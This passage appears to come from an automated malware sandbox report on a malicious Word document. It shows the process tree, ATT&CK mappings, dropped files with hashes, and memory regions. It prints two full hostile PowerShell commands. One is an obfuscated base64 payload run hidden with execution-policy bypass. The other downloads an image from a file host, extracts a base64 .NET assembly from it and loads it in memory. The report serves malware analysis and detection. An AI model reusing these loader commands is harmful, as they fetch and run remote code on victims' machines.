zIALZOBTJ2SgKUzIALZOBTJDQSgKUzIALZOBTJXwBTSgKUzIALZOBTJFQSgKUzIALZOBTJQQBSSgKUzIALZOBTJFQSgKUzIALZOBTJPgSgKUzIALZOBTJ+SgKUzIALZOBTJCcSgKUzIALZOBTJOwSgKUzIALZOBTJkSgKUzIALZOBTJGUSgKUzIALZOBTJbgBkSgKUzIALZOBTJEYSgKUzIALZOBTJbSgKUzIALZOBTJBhSgKUzIALZOBTJGcSgKUzIALZOBTJISgKUzIALZOBTJSgKUzIALZOBTJ9SgKUzIALZOBTJCSgKUzIALZOBTJSgKUzIALZOBTJJwSgKUzIALZOBTJ8SgKUzIALZOBTJDwSgKUzIALZOBTJQgBBSgKUzIALZOBTJFMSgKUzIALZOBTJRQSgKUzIALZOBTJ2SgKUzIALZOBTJDQSgKUzIALZOBTJXwBFSgKUzIALZOBTJE4SgKUzIALZOBTJRSgKUzIALZOBTJSgKUzIALZOBTJ+SgKUzIALZOBTJD4SgKUzIALZOBTJJwSgKUzIALZOBTJ7SgKUzIALZOBTJCQSgKUzIALZOBTJcwB0SgKUzIALZOBTJGESgKUzIALZOBTJcgB0SgKUzIALZOBTJEkSgKUzIALZOBTJbgBkSgKUzIALZOBTJGUSgKUzIALZOBTJeSgKUzIALZOBTJSgKUzIALZOBTJgSgKUzIALZOBTJD0SgKUzIALZOBTJISgKUzIALZOBTJSgKUzIALZOBTJkSgKUzIALZOBTJGkSgKUzIALZOBTJbQBhSgKUzIALZOBTJGcSgKUzIALZOBTJZQBUSgKUzIALZOBTJGUSgKUzIALZOBTJeSgKUzIALZOBTJB0SgKUzIALZOBTJC4SgKUzIALZOBTJSQBuSgKUzIALZOBTJGQSgKUzIALZOBTJZQB4SgKUzIALZOBTJE8SgKUzIALZOBTJZgSgKUzIALZOBTJoSgKUzIALZOBTJCQSgKUzIALZOBTJcwB0SgKUzIALZOBTJGESgKUzIALZOBTJcgB0SgKUzIALZOBTJEYSgKUzIALZOBTJbSgKUzIALZOBTJBhSgKUzIALZOBTJGcSgKUzIALZOBTJKQSgKUzIALZOBTJ7SgKUzIALZOBTJCQSgKUzIALZOBTJZQBuSgKUzIALZOBTJGQSgKUzIALZOBTJSQBuSgKUzIALZOBTJGQSgKUzIALZOBTJZQB4SgKUzIALZOBTJCSgKUzIALZOBTJSgKUzIALZOBTJPQSgKUzIALZOBTJgSgKUzIALZOBTJCQSgKUzIALZOBTJaQBtSgKUzIALZOBTJGESgKUzIALZOBTJZwBlSgKUzIALZOBTJFQSgKUzIALZOBTJZQB4SgKUzIALZOBTJHQSgKUzIALZOBTJLgBJSgKUzIALZOBTJG4SgKUzIALZOBTJZSgKUzIALZOBTJBlSgKUzIALZOBTJHgSgKUzIALZOBTJTwBmSgKUzIALZOBTJCgSgKUzIALZOBTJJSgKUzIALZOBTJBlSgKUzIALZOBTJG4SgKUzIALZOBTJZSgKUzIALZOBTJBGSgKUzIALZOBTJGwSgKUzIALZOBTJYQBnSgKUzIALZOBTJCkSgKUzIALZOBTJOwSgKUzIALZOBTJkSgKUzIALZOBTJHMSgKUzIALZOBTJdSgKUzIALZOBTJBhSgKUzIALZOBTJHISgKUzIALZOBTJdSgKUzIALZOBTJBJSgKUzIALZOBTJG4SgKUzIALZOBTJZSgKUzIALZOBTJBlSgKUzIALZOBTJHgSgKUzIALZOBTJISgKUzIALZOBTJSgKUzIALZOBTJtSgKUzIALZOBTJGcSgKUzIALZOBTJZQSgKUzIALZOBTJgSgKUzIALZOBTJDSgKUzIALZOBTJSgKUzIALZOBTJISgKUzIALZOBTJSgKUzIALZOBTJtSgKUzIALZOBTJGESgKUzIALZOBTJbgBkSgKUzIALZOBTJCSgKUzIALZOBTJSgKUzIALZOBTJJSgKUzIALZOBTJBlSgKUzIALZOBTJG4SgKUzIALZOBTJZSgKUzIALZOBTJBJSgKUzIALZOBTJG4SgKUzIALZOBTJZSgKUzIALZOBTJBlSgKUzIALZOBTJHgSgKUzIALZOBTJISgKUzIALZOBTJSgKUzIALZOBTJtSgKUzIALZOBTJGcSgKUzIALZOBTJdSgKUzIALZOBTJSgKUzIALZOBTJgSgKUzIALZOBTJCQSgKUzIALZOBTJcwB0SgKUzIALZOBTJGESgKUzIALZOBTJcgB0SgKUzIALZOBTJEkSgKUzIALZOBTJbgBkSgKUzIALZOBTJGUSgKUzIALZOBTJeSgKUzIALZOBTJSgKUzIALZOBTJ7SgKUzI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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('SgKUzIALZOBTJ','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnl5eXl5eWFkaXJmLzYzMi4zNTIuNjUxLjQ5Ly86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A54F7131-3B7A-4A9D-84B7-C55FE02B0D54}.FSD

Filesize
128KB

MD5
3a29699ff634c4df8895cc980935a18e

SHA1
a221e0f848d58f25669fcf40c3eecee190144dfd

SHA256
2f154c8afe40f7d5101cf84079e870cc3bb55b1b4c73b4182e94aef2f88cf4ab

SHA512
1113be9947fdda1bbb898100a64d3df8f44ed88d8c32ed548cb3657e0e3f9ea7e9426a9abd62cee9ebd521e1a18938c262046529fe1eed500871751401683ed0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
7817bc6258cafef138f28da3f57eb22a

SHA1
c5d1fc945f5d88caf86ccc655dc8cdbfee2a556a

SHA256
708172dd6cd5f5f723513e91b8bad83c106995fead6ad82bec0a8b5e7ffa4b15

SHA512
8ebe1a45b36268f23a81573c462e00a962df7ad59c6475dd491d19065fe04c14127236407b30e11da8c60921976336c4995511a2b5354d14bd57e99d9f6f87bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{F4536044-1857-48E6-972A-D9B0E03DA3E7}.FSD

Filesize
128KB

MD5
31c3f77b37f763a587ec7cb11e3e4663

SHA1
f475ec6793668644c5b0446a9a711fa30bc58c07

SHA256
ef8404134d02b7a34ed7ba8c66ae630cec023b932cd5bf5f89ab16448f9835c9

SHA512
1318ba4542cc0091b08fef0ea6a3fe23e1376995ab07a077e2cc046f3519aaff9d5c26fbe4a0f3810b084b5363f35b5ae5fd8589c7469e2579c464b59ecbee33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VSQV6XDQ\HTMLcvdesiii[1].doc

Filesize
22KB

MD5
427a881f48c7c470b824e62dc28a0170

SHA1
0bc7e5db7310e39253a0604c6d68503a0c52414c

SHA256
72d2aa1f7763c44de09930674529ba17915bdb1fa04205957c62137cf1411a92

SHA512
780250dcb16ee684d0281dfeac4cc02e0f4d47d4e87d919b31efa9bb519704cf4ee4d7b85906a667111251d2a0eecf9975537f739e3893e58482e74e33418ef6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D92696BA.doc

Filesize
22KB

MD5
427a881f48c7c470b824e62dc28a0170

SHA1
0bc7e5db7310e39253a0604c6d68503a0c52414c

SHA256
72d2aa1f7763c44de09930674529ba17915bdb1fa04205957c62137cf1411a92

SHA512
780250dcb16ee684d0281dfeac4cc02e0f4d47d4e87d919b31efa9bb519704cf4ee4d7b85906a667111251d2a0eecf9975537f739e3893e58482e74e33418ef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\{5DE74D65-8D71-4157-9AB5-1F569E563539}

Filesize
128KB

MD5
43c6c21e19a577b1c2c3b187524c2172

SHA1
94f34c3524649c7e766c6ed6c5561a4b0d0c09ed

SHA256
29de8241609d04508e17bc71ef48085ef70bc15ca6ddbd324fc56ae9d818f305

SHA512
f25e9602604f2e4360f2acadaab24c9592add678c0da713a9856ebb263685c8a3106dce54f0d17144f54e761338769b7eb642a2d0f5a50effde511a6958edd44

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
da6ba809ef7d85f451fd25f61ca7a907

SHA1
8fb8b77dbb73332979172a527fba9c6d1a4222fd

SHA256
513a160a48b48b59f72a3bad1350b91bae03a731842d104517b19aabb82ecba6

SHA512
7392f8bf15a29caac177ab06da0e81f4fa599353acfb308e754f0459e5dc8de6b55062d999b05fc5b53d4fc4f45246583496b19a60be28d180d2533405898d8a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AN2SBMQYTN921QKWJCAY.temp

Filesize
7KB

MD5
b99826b85aa82d33a8ad3c35dee991a7

SHA1
d2a3e3d64709f3221e07d2ad54e85b545c41a737

SHA256
9f7dfffc023c4bd5bd04fd168579fa92ed34f096edca06a84ff8d3468567b78c

SHA512
a6630b7e2dddaf201b0ce59f27b606efaf43e4e526ea245b15d5d513c8ba329e21c767c3d6b1b5eb366ddabd335c8bd6683fd1c7ed8d646c9ef34d9d6c78b641

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b99826b85aa82d33a8ad3c35dee991a7

SHA1
d2a3e3d64709f3221e07d2ad54e85b545c41a737

SHA256
9f7dfffc023c4bd5bd04fd168579fa92ed34f096edca06a84ff8d3468567b78c

SHA512
a6630b7e2dddaf201b0ce59f27b606efaf43e4e526ea245b15d5d513c8ba329e21c767c3d6b1b5eb366ddabd335c8bd6683fd1c7ed8d646c9ef34d9d6c78b641

Download Submit
C:\Users\Admin\AppData\Roaming\audiodgse.vbs

Filesize
1.1MB

MD5
288d724f6234e9a79e54451391e158fe

SHA1
731b68d55f1f343d2169b9b1b6e4530aad0c77ef

SHA256
6c1b8cb721e8c845ec00d81e79eb8d9cbeef9fb2ec00c9a46088187017a0f821

SHA512
a4e1da46a8528fa653b351b5691a4b63a0aee83483e3b16d5ea5bdc99017cc16596c9924bd6011903291fa846b7a26c6845e734acba7c85c38c918584c45ee82

Download Submit
C:\Users\Admin\AppData\Roaming\audiodgse.vbs

Filesize
1.1MB

MD5
288d724f6234e9a79e54451391e158fe

SHA1
731b68d55f1f343d2169b9b1b6e4530aad0c77ef

SHA256
6c1b8cb721e8c845ec00d81e79eb8d9cbeef9fb2ec00c9a46088187017a0f821

SHA512
a4e1da46a8528fa653b351b5691a4b63a0aee83483e3b16d5ea5bdc99017cc16596c9924bd6011903291fa846b7a26c6845e734acba7c85c38c918584c45ee82

Download Submit
memory/1760-142-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-125-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-159-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1760-158-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1760-157-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1760-156-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/1760-154-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-152-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-150-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-148-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-107-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/1760-108-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1760-109-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/1760-110-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/1760-146-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-144-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-113-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-114-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-116-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-118-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-120-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-122-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-140-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-138-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-127-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-129-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-131-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-133-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/1760-135-0x0000000006710000-0x0000000006A2A000-memory.dmp

Filesize
3.1MB

Download
memory/2144-101-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/2144-190-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/2144-1-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/2144-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2144-9-0x0000000002D10000-0x0000000002D12000-memory.dmp

Filesize
8KB

Download
memory/2172-112-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/2172-100-0x0000000002640000-0x0000000002680000-memory.dmp

Filesize
256KB

Download
memory/2172-99-0x0000000002640000-0x0000000002680000-memory.dmp

Filesize
256KB

Download
memory/2172-98-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/2172-97-0x000000006A290000-0x000000006A83B000-memory.dmp

Filesize
5.7MB

Download
memory/2172-123-0x0000000002640000-0x0000000002680000-memory.dmp

Filesize
256KB

Download
memory/2172-137-0x0000000002640000-0x0000000002680000-memory.dmp

Filesize
256KB

Download
memory/2720-4-0x000000002F411000-0x000000002F412000-memory.dmp

Filesize
4KB

Download
memory/2720-6-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/2720-111-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download
memory/2720-8-0x00000000035C0000-0x00000000035C2000-memory.dmp

Filesize
8KB

Download
memory/2720-183-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2720-189-0x000000007223D000-0x0000000072248000-memory.dmp

Filesize
44KB

Download